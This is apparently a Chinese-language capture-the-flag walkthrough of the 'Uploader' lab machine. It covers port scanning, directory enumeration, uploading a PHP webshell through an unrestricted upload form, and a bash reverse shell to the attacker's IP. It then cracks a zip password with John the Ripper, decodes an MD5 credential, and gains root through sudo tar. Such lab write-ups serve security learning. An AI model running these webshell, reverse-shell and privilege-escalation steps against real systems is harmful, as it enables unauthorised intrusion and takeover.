Uploader

image

信息搜集

192.168.100.59

端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
┌──(root㉿LAPTOP-O235O5EH)-[~]
└─# rustscan -a 192.168.100.59
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Real hackers hack time ⌛

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 10140'.
Open 192.168.100.59:80
[~] Starting Script(s)
[~] Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-23 15:43 +0800
Initiating ARP Ping Scan at 15:43
Scanning 192.168.100.59 [1 port]
Completed ARP Ping Scan at 15:43, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:43
Completed Parallel DNS resolution of 1 host. at 15:43, 2.50s elapsed
DNS resolution of 1 IPs took 2.50s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 3, CN: 0]
Initiating SYN Stealth Scan at 15:43
Scanning 192.168.100.59 [1 port]
Discovered open port 80/tcp on 192.168.100.59
Completed SYN Stealth Scan at 15:43, 0.01s elapsed (1 total ports)
Nmap scan report for 192.168.100.59
Host is up, received arp-response (0.0015s latency).
Scanned at 2026-03-23 15:43:42 CST for 0s

PORT   STATE SERVICE REASON
80/tcp open  http    syn-ack ttl 64
MAC Address: 08:00:27:ED:52:CC (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 2.63 seconds
           Raw packets sent: 2 (72B) | Rcvd: 2 (72B)·

枚举 80/tcp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
┌──(root㉿LAPTOP-O235O5EH)-[/opt/penelope]
└─# gobuster dir -u http://192.168.100.59/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt -o fuzz
===============================================================
Gobuster v3.8.2
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.100.59/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.8.2
[+] Extensions:              php,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
uploads              (Status: 301) [Size: 318] [--> http://192.168.100.59/uploads/]
upload.php           (Status: 200) [Size: 3277]
server-status        (Status: 403) [Size: 279]
Progress: 661674 / 661674 (100.00%)
===============================================================
Finished
===============================================================

是一个文件上传的web页面,且没有限制php后缀直接上传一句话木马

image

image

会在uploads目录随机创建一个文件夹存放再此。

image

反弹shell

1
?cmd=bash -c 'exec bash -i %26>/dev/tcp/192.168.100.12/9999 <%261'

image

提权

www -> operatorx

在/home文件夹中存在hint

Readme.txt

image

压缩文件存放在了一个隐秘的地方

1
find / -type f -iname "*.zip" -user root -ls 2>/dev/null

image

提取到kali分析

image

解压发现需要凭证

image

爆破凭证

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
┌──(root㉿LAPTOP-O235O5EH)-[/home]
└─# zip2john File.zip >zip
ver 2.0 File.zip/Credentials/ is not encrypted, or stored with non-handled compression type

┌──(root㉿LAPTOP-O235O5EH)-[/home]
└─# john zip --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (ZIP, WinZip [PBKDF2-SHA1 256/256 AVX2 8x])
Cost 1 (HMAC size) is 64 for all loaded hashes
Will run 24 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
121288           (File.zip/Credentials/Credentials.txt)
1g 0:00:00:00 DONE (2026-03-24 19:09) 10.00g/s 491520p/s 491520c/s 491520C/s 123456..trudy
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

密码是121288

解压

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
┌──(root㉿LAPTOP-O235O5EH)-[/home]
└─# 7z x File.zip

7-Zip 26.00 (x64) : Copyright (c) 1999-2026 Igor Pavlov : 2026-02-12
 64-bit locale=en_US.UTF-8 Threads:24 OPEN_MAX:10240, ASM

Scanning the drive for archives:
1 file, 430 bytes (1 KiB)

Extracting archive: File.zip
--
Path = File.zip
Type = zip
Physical Size = 430


Enter password (will not be echoed):
Everything is Ok

Folders: 1
Files: 1
Size:       67
Compressed: 430

┌──(root㉿LAPTOP-O235O5EH)-[/home]
└─# ls
Credentials  Eecho  File.zip  zip

横向移动到operatorx用户

1
2
3
4
5
6
7
8
9
┌──(root㉿LAPTOP-O235O5EH)-[/home/Credentials]
└─# ls
Credentials.txt

┌──(root㉿LAPTOP-O235O5EH)-[/home/Credentials]
└─# cat Credentials.txt
User: operatorx

Password: d0970714757783e6cf17b26fb8e2298f

operatorx -> root

切换到operatorx 发现凭证不对仔细观察发现是md5需要再次解密

https://www.cmd5.com/

image

image

存在sudo tar提权

1
2
3
4
5
6
7
operatorx@TheHackersLabs-Operator:/var/www/html/uploads/cloud_325b6f$ sudo -l
Matching Defaults entries for operatorx on TheHackersLabs-Operator:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User operatorx may run the following commands on TheHackersLabs-Operator:
    (ALL) NOPASSWD: /usr/bin/tar

gtfobins有现成方案https://gtfobins.org/gtfobins/tar/#shell

image

image